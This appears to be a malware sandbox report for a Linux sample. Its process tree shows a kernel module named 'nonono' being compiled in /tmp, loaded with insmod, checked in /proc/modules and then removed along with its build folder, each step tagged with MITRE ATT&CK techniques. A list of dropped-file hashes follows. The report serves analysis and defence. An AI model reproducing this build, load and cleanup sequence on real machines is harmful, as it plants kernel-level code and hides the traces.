-Wno-format-overflow -Wno-address-of-packed-member -O2 -fno-allow-store-data-races -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough=5 -Wno-main -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-stack-clash-protection -g -gdwarf-5 -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-zero-length-bounds -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -Wno-alloc-size-larger-than -fno-strict-overflow -fno-stack-check -fconserve-stack -Werror=date-time -Werror=incompatible-pointer-types -Werror=designated-init -Wno-packed-not-aligned -fsanitize=bounds -fsanitize=shift -fsanitize=bool -fsanitize=enum -DMODULE -DKBUILD_BASENAME='\"nonono.mod\"' -DKBUILD_MODNAME='\"nonono\"' -D__KBUILD_MODNAME=kmod_nonono -c -o /tmp/a/nonono.mod.o /tmp/a/nonono.mod.c"6⤵PID:1942
-
-
/usr/bin/rmrm -f /tmp/a/.nonono.mod.o.d6⤵PID:1943
-
-
-
/bin/sh/bin/sh -c "set -e; echo ' LD [M] /tmp/a/nonono.ko'; trap 'rm -f /tmp/a/nonono.ko; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/nonono.ko; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/nonono.ko; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/nonono.ko; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/nonono.ko; trap - PIPE; kill -s PIPE \$\$' PIPE; ld -r -m elf_x86_64 -z noexecstack --build-id=sha1 -T scripts/module.lds -o /tmp/a/nonono.ko /tmp/a/nonono.o /tmp/a/nonono.mod.o; true; printf '%s\\n' 'cmd_/tmp/a/nonono.ko := ld -r -m elf_x86_64 -z noexecstack --build-id=sha1 -T scripts/module.lds -o /tmp/a/nonono.ko /tmp/a/nonono.o /tmp/a/nonono.mod.o; true' > /tmp/a/.nonono.ko.cmd"5⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1944 -
/usr/bin/ldld -r -m elf_x86_64 -z noexecstack "--build-id=sha1" -T scripts/module.lds -o /tmp/a/nonono.ko /tmp/a/nonono.o /tmp/a/nonono.mod.o6⤵
- System Network Configuration Discovery
PID:1945
-
-
-
/bin/sh/bin/sh -c "set -e; echo ' BTF [M] /tmp/a/nonono.ko'; trap 'rm -f /tmp/a/nonono.ko; trap - HUP; kill -s HUP \$\$' HUP; trap 'rm -f /tmp/a/nonono.ko; trap - INT; kill -s INT \$\$' INT; trap 'rm -f /tmp/a/nonono.ko; trap - QUIT; kill -s QUIT \$\$' QUIT; trap 'rm -f /tmp/a/nonono.ko; trap - TERM; kill -s TERM \$\$' TERM; trap 'rm -f /tmp/a/nonono.ko; trap - PIPE; kill -s PIPE \$\$' PIPE; if [ -f vmlinux ]; then LLVM_OBJCOPY=\"objcopy\" pahole -J --btf_base vmlinux /tmp/a/nonono.ko; else printf \"Skipping BTF generation for %s due to unavailability of vmlinux\\n\" /tmp/a/nonono.ko 1>&2; fi;"5⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
PID:1946
-
-
-
-
-
/usr/sbin/insmodinsmod nonono.ko2⤵
- Loads a kernel module
PID:1947
-
-
/usr/bin/grepgrep -q nonono /proc/modules2⤵
- Reads list of loaded kernel modules
- Reads runtime system information
PID:1949
-
-
/usr/bin/pidofpidof 821c0ca42⤵
- Reads runtime system information
PID:1950
-
-
/usr/bin/rmrm -rf /tmp/a2⤵PID:1951
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5477c633132ecd07121197846b492d63e
SHA19f0b68643c22acc2854ae9c7965c962505443840
SHA256bfa546d660428e50ed9b1e159afc3c07441d815c55bef1994e50f2735552801c
SHA5123ad4232d986b5ee3811ad72bf2064b34c6e60be093c0d7a35c7fdb65465fa4b8dabe57e414ee730345123a07c32ea27c89d10f1894be795f908ac06231acb19e
-
Filesize
103B
MD5024a1f4e7cccfa3f483bf58232a183f3
SHA105126884127a4de807ccba00d74cd7084938cf06
SHA256a6b345f964a4d41477432954f209fbe32f9c98984e5996175d73466d6b278cb9
SHA512757dc92dc6fc30e3ae8b760b4a5e7ab67e3be4f6907630d3394ac1c5c8675f9ebc987961df9a86db7390b04af610bfc1d8d9227631f74949f39374760ba35df4
-
Filesize
161B
MD52d4b2f4b4146b77445bd747515245009
SHA1f578a6f46e2cac56db297fcda6a19381e0edfecc
SHA256d9e10ec1c5ea4941e83ad15e91bdd163d1d5a2fde58be32f11643844f559f8ac
SHA512f9e76545462665f59939b448e800d7e52c990fe703e0fe567b3288b5d980c9d0c91d1d564f88d9458150fd95d9e02bd4fe2d8f7a980ac19c39af60c1181251fd
-
Filesize
79B
MD54c5b034c4ab24e15bc0e3e5fc703391b
SHA1daf7bdcf1ff86d6f96cf643af5d26f7ba0772bd1
SHA256d9d5b5111fe991931f14cd2fb6c0ecade9ab0c43f9be39ee855e1772001e7c51
SHA512e08b6b42bedff9e02aca6ba794cd89f67f2b9a0fff18daf549e65f8c5275d4b297cc8f421483e56f19a5ceca8bfe6265b960d99a5935b85d9d0a38a29f5c7cf1
-
Filesize
10KB
MD50845d7fa5ce974147003151d53b87f20
SHA1a15b779812583ce37a7cb9e11f98d572b5e0b6e8
SHA25631ae4a11e0080d06e65373e2bdeedaf52a14f5488d8fedcb410b182f668f75ed
SHA512abe66fa8daac80aa0db77df9670c934d7e87323bd9c17af6c53657b229e1e3e5c3d4c63f0afcc1be6fcf85d92d95c2c7f8e2dfafaf2195949b9c58bfb6d1c970
-
Filesize
18KB
MD5acffaaa68ce123b5976448f60de66c8e
SHA1731f74e1d256d6ad16a94238d55871b794007661
SHA25614b9b2da18737769fc4a1d7b79e8dd56ae913b92c450077412d20c513c255ef4
SHA5121796961e89bebdaba0df08e0419fcb3699fedce2d6daa8a03352a43d88d2bc3d7d7f3257d8c042f1f7b042926993681a2797637094ac207b87b13670c20f8334
-
Filesize
928B
MD5988e84a6844941c6d6d819887a22ec4f
SHA1cb4728c1940a60e47d1972ae7a09b5886b6024e2
SHA256bb7384b6fbf16ddd339e90703e215acc14911d1544dbb3ae3d7e06a834671e65
SHA512b677c6ca48a54f47fefc0ac5473c8658b4bb825d0241da302c8fc5151ca638e1abdbb388a931e0473ffee6e831aacc5df740c0c8c4c60d68862c98fdb1ff04db
-
Filesize
816B
MD54d6e0bba1e6a46d5a9fbadf4857e9159
SHA1f241557e73eb91f503631f94d500d6ebf2d2662e
SHA256cd44b1f47e840b4085b4fd0edb119bcab90aa302c6b8174a35ef4aa31c51bce4
SHA512c779146de7081291d1265bd7efc9f0b8816c8e58c80603782ae9d4ad4a947bc5ab3706e441b339fa9db39dfeaa9fa3fc07f1e99a40ab36fbaf6e01632f05ca97
-
Filesize
720B
MD57c17a2b8b9bdb80ceae34ae62a6a871c
SHA1be604b6fb1ce2262742ede3d97bcaa5e2446ee3d
SHA2568bb182ccbed45f5d966fd05db30cee3494acbb47e8456901f46ff0bf3228a0e6
SHA5129b2047d2944a0e6e812e8742a5039ab18d2f3dbb6cf3e110fc42ddbada777b6de4d7e5ea2b86a804bddfd71041f14f371e28f015cd20f83c1e82aa5a0e3df762
-
Filesize
4KB
MD5362f1b1f3a86d02d5219b8a65924c014
SHA15422e2ec426f0dd356d181c9adae906b0a1b9a19
SHA256755ea0be64a21685b2faec0037cb68948c0ec2567a8ffca436fad1bd6ac0e370
SHA512dee04c0e1450bd1dfbb87ceebb1249cf127b6119a3fa62fe9d188be48d73d35091e04dbee31ec829c76e121b7c95808c0ad57fb750825446b8f1f8ee3bb49296
-
Filesize
1KB
MD54c5cc699f14fed7e5333b81960667515
SHA19be4f2a70c5080d55b8c2c7a1556e9dc1a9da036
SHA2569efcbaaa60b3d5f0d5efde66d6ee727b2a4cd5bfdf81c278e2a8539400352b8d
SHA5127394f6281956c1a15a60856f4fe67621fda548aa1a4c9515f3b6437ee748f9f219b95dc356abc82dbd44376721215c6756d6fe41f1913ec1c5e96813717453cb
-
Filesize
1KB
MD55b73c0b10ddb6fb4bdff77534d29f7ac
SHA1f937dd9ef4f0f09516e79d90851fdfd9df2359f6
SHA25695bc23223042b223b4eadbcc03f0b7ba695e1778f0b3d83781f635d525a421b5
SHA512eb12de7da9d880125d32b9656d13355eb5f612eff7ec1172408c288e1f9df26a688eb3cb4fa9a5e1898aa5b2d987d5aa8b4655e1880f9a57e55538ac33b9daa2
-
Filesize
1KB
MD57eeca41a83144412067e2b695450310b
SHA16272beb2f079d845c9436b7386ab0074367d1c47
SHA256f590ca1e5936ade319242695c2d6b0f0cfe4f95e23bf5950ede1ecec9bfce6b7
SHA5125a09272492f3be749249c0cbac0fd9292145c594d54e522e6ee02d31b23c5fc93c9fa5df3373c5257a7b2ef1fc6202326f351d98d2174df3fe5e5671d0369b49
-
Filesize
93B
MD58b6517794dabb41611388651c2d10e56
SHA15387c82ef8aee3c52a3c71c7689de0db1d25358b
SHA256282002da37f955757fb0c9519bc888713626ce8b39d80dac6c369aa498796b57
SHA512c775f97d6549054ca0c12e3e018c9798b769dc2e2824aa1d055c762f4cd84bf96a0fda8f9ab20ccbe63f854a6fce2136bba54c4227c38dbc668d8fdfd34701dc
-
Filesize
17B
MD5bf18a7dce75fabbc0a4972e94377579b
SHA19ce0686ff956ae445bea8c5268e2a6591b004ec9
SHA2567317cf501a579b9feb09c34c09e551812db0a10615d9ef994088123855cc90cb
SHA5121988c0f5ffb7f2cbba68be477288dfa914b665958a737809f4b24186a2331d165818480069371455122fe53729c81a7ce44b34a1419c66dda5a57318625dfefb
-
Filesize
651B
MD547b95e35b51d7c03ad3695bd67e0db87
SHA1a4aacc0d2b9c93981ab0475b49a7799f7cc93664
SHA256fe03daf1805d8bd3d0cdc1502d76c4c6ca383bf2a57daa9f009e32f7c2a3770a
SHA512b3eac5076b207ce51da3e2c744dca800ef49da5795950937b4ef527500fb40e04bf6dc60fcfa22c9ca3ab14c0f2997ae46099d4d29c461d0cb577d7c0987d37a
-
Filesize
1KB
MD53514cba0d7d195e0163ad780c4f34850
SHA1585d7a59dafbd4f420db99b416e39429b3447e95
SHA256fb0e34887da02c53bd5e535e1f616d785cb593cd8dce0f4c6c9222a5e0147c83
SHA51243e1f7da02963b6ec2eb1cfa8e9a431f5e79135a845d594817eb4094ef9fb591665d72d67e4dc502f65d53d76cc38115087a1c64e56c8db8d98cc09fde3372b2
-
Filesize
289B
MD5d3c9c905a71077cd3649b767c484526b
SHA15d4d9b89ac680e7d3c7b62d46024cac18d4e8e76
SHA256164c65567407d68f6fc368d441f8d433eb011e57ef039fe1b205df0ae332af70
SHA51216cc64797f6f15c6d2b765639b82c54a7214624c27236aff66896584ac8933cd9b357ea4cba6bb1b9dff5d6fb7c8dd82eb7e30e9f7db8100d4c3b989127ecb7a
-
Filesize
1KB
MD53ff68d259c20d0b69036248f4b808517
SHA11f5b4e3f5864983a2f792c5442f7204108869f67
SHA2562d12cbcf927329dcd7d6ee1e65b408ffbac3713ae5722da0a5f7db2edf3585a9
SHA512ae549ca3694ee872c3232eb0f109f71c409fd2b9ae0ebd9f426748eb0fe994b3e09a10943f4328c301c6c1147e18cace279340dbec3229cfca21e476c602c972
-
Filesize
113B
MD5c5991e6e36f31086a6f815844feecb70
SHA185c74b4afbe505c6a3ebc30ccf737acd4c74af75
SHA2565591787cfbb71de41950bdf07ad8869ce49f189a13f7fbdfe0893ac6aa053631
SHA512a7e96cdfa1fec640314698b42003513fa8b70b87a34c701367bc26f69db0682c09c94be607b51d863877db271114fe3ceb4398db980fcb18c39def5fcb6111b0
-
Filesize
1KB
MD5032796cf03ba7638596b39d4b022f08b
SHA103fb468500a6c85ec7bcca32729d1b5ad95e5de4
SHA25694d2dd14e80c566fe3fb10366fbbdf7a09d23da4c1b1a0721cc94b854ffcf3b8
SHA5122adf4a11d418de41769ff96f25ede3f15c90a79771cf6be3e5bcd81e5e78aa67e92b5ffd6ee87ed34a0e38af46cd89636854fa1c3470d74ba18ac62dab44a6aa
-
Filesize
718KB
MD54c61c6df7ed31c9cb790c5b7c5312ab5
SHA1d88bfedc8946993f136e9d0b279a11cb2d6531de
SHA2561999c6eabe66bddbb8db8a7313b200bc38bc1fd27f9151fdac2aabded4455218
SHA51212adc271c453d100798b4cd0eb9f7f615ddca4ed243ca4f891f105cb1777f0f693e06dd74a9fe3f3dc08d338e0f40c61db5b2bcd9b8e7fb17bc557f8fd280c3e
-
Filesize
124KB
MD565f0fee59053a4d6adefc88962ad46f0
SHA1115ca972560e1d12c8bc7e1cf456d60a55cc61a2
SHA25634f72692759c09ae293374500b245050996dff7c4e9aaf1559bf54af7184c36c
SHA512b882bb6640d8febeb72c99d0ba578ff5d20897ee6251048e016d60021b921a8b3d0ef4a74a4e07f4e0f5b8de69a4056818c22bc6a23031b46ccaf1fa815380af